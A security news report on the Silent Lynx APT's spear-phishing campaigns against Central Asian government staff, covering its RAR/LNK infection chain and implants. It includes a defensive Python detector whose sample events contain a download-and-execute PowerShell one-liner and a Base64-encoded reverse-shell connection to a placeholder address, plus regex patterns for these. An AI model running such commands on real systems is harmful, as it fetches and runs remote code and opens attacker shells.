
Silent Lynx APT New Attack Targeting Governmental Employees Posing as Officials

Silent Lynx, a sophisticated threat group that has been tracked since 2024, continues its relentless espionage campaign against government entities across Central Asia.

Seqrite analysts, who were the first to assign this name, distinguish the group from multiple overlapping aliases including YoroTrooper, Sturgeon Phisher, and ShadowSilk.

The group has become notorious for orchestrating spear-phishing campaigns while impersonating government officials, specifically targeting governmental employees with malicious attachments designed to harvest sensitive information.

The threat group primarily leverages fabricated summit-related communications to distribute its weaponized payload.

Seqrite researchers noted that Silent Lynx demonstrates a pattern of hastily constructed campaigns targeting diplomatic entities involved in high-level international meetings.

The group’s operations extend across multiple Central Asian nations including Tajikistan, Azerbaijan, Russia, and China, with strategic focus on nations involved in cross-border infrastructure projects and diplomatic initiatives.

Seqrite analysts identified two distinct campaigns in 2025, both employing similar attack methodologies but targeting different geopolitical relationships.

The first campaign, discovered in October 2025, targeted diplomatic entities involved in Russia-Azerbaijan summit preparations, while the second focused on entities associated with China-Central Asian relations.

The timing and thematic consistency of these campaigns reveal a coordinated espionage operation driven by geopolitical interests rather than financial gain.

Infection Mechanism and Technical Arsenal

The infection chain begins with a deceptive RAR archive bearing benign filenames like “План развитие стратегического сотрудничества.pdf.rar” (Plan for Development of Strategic Cooperation).

When extracted, the archive reveals a malicious Windows shortcut file that abuses PowerShell.exe to download and execute obfuscated scripts from GitHub repositories.

The LNK file contains working directory metadata pointing to C:\Users\GoBus\OneDrive\Рабочий стол, serving as a pivot point for tracking additional campaigns.

Infection Chain (Source – Seqrite)

The downloaded PowerShell script contains Base64-encoded reverse shell code that connects to remote command-and-control servers on port 443.

The decoded payload establishes a persistent TCP connection where it reads commands from operators, executes them via Invoke-Expression, and returns output across the same channel.
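The chain described above (shortcut-spawned powershell.exe, script fetched from GitHub, Base64 blob decoded and handed to Invoke-Expression, socket to port 443) can be matched against process-creation and script-block telemetry. The following detector is an added example, not Seqrite's tooling; the event field names, the GitHub path and the 203.0.113.10 address are constructed placeholders.

```python
# Added example, not Seqrite's tooling: flags the LNK -> PowerShell -> Base64
# reverse-shell stage in constructed process-creation and script-block events.
# Field names, the repository path and the C2 address are placeholders.
import base64
import re

DOWNLOAD_RE = re.compile(r"raw\.githubusercontent\.com|github\.com", re.I)
IEX_RE = re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long Base64 runs
SOCKET_RE = re.compile(r"Net\.Sockets\.TCPClient\([^)]*,\s*443\)", re.I)


def decode_b64_blobs(text):
    """Decode long Base64 runs that turn out to be printable UTF-8 text."""
    out = []
    for blob in B64_RE.findall(text):
        try:
            s = base64.b64decode(blob, validate=True).decode("utf-8")
        except ValueError:  # not valid Base64, or not text
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in s):
            out.append(s)
    return out


def score_event(ev):
    """Return the indicators one event matches (empty list if none)."""
    hits = []
    text = ev.get("CommandLine", "") + "\n" + ev.get("ScriptBlockText", "")
    # A double-clicked shortcut launches its target under explorer.exe.
    if (ev.get("Image", "").lower().endswith("powershell.exe")
            and ev.get("ParentImage", "").lower().endswith("explorer.exe")):
        hits.append("powershell_from_explorer")
    if DOWNLOAD_RE.search(text):
        hits.append("github_download")
    if IEX_RE.search(text):
        hits.append("invoke_expression")
    if any(SOCKET_RE.search(d) for d in decode_b64_blobs(text)):
        hits.append("b64_reverse_shell")  # decoded blob dials out on port 443
    return hits


# Constructed telemetry: 0 = LNK stage, 1 = downloaded script decoding its
# Base64 payload, 2 = benign administrative use that must not alert.
PAYLOAD = "$c=New-Object System.Net.Sockets.TCPClient('203.0.113.10',443)"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://raw.githubusercontent.com/PLACEHOLDER/s.ps1 | iex"'},
    {"ScriptBlockText": "$b='%s';iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))"
                        % base64.b64encode(PAYLOAD.encode()).decode()},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]
```

Treating two or more matched indicators on one event as an alert keeps routine scripted administration (event 2) quiet while both malicious stages (events 0 and 1) trip.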

Seqrite researchers identified three primary implants deployed in these campaigns: Silent Loader (a C++ based downloader), Laplas (a TCP and TLS-based reverse shell), and SilentSweeper (a .NET implant capable of extracting and executing embedded PowerShell scripts).

The SilentSweeper implant accepts multiple arguments including -extract for writing embedded malicious PowerShell to disk and -debug for troubleshooting.

It reads a file named qw.ps1 from its Resources section, executes the contents, and downloads additional reverse shell payloads.

Beyond remote access, Seqrite analysts observed deployment of Ligolo-ng, an open-source tunneling tool, providing operators unrestricted command execution capabilities on compromised systems.

The multi-stage infection mechanism shows a degree of operational sophistication, even though numerous OPSEC blunders made attribution and tracking easier.


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
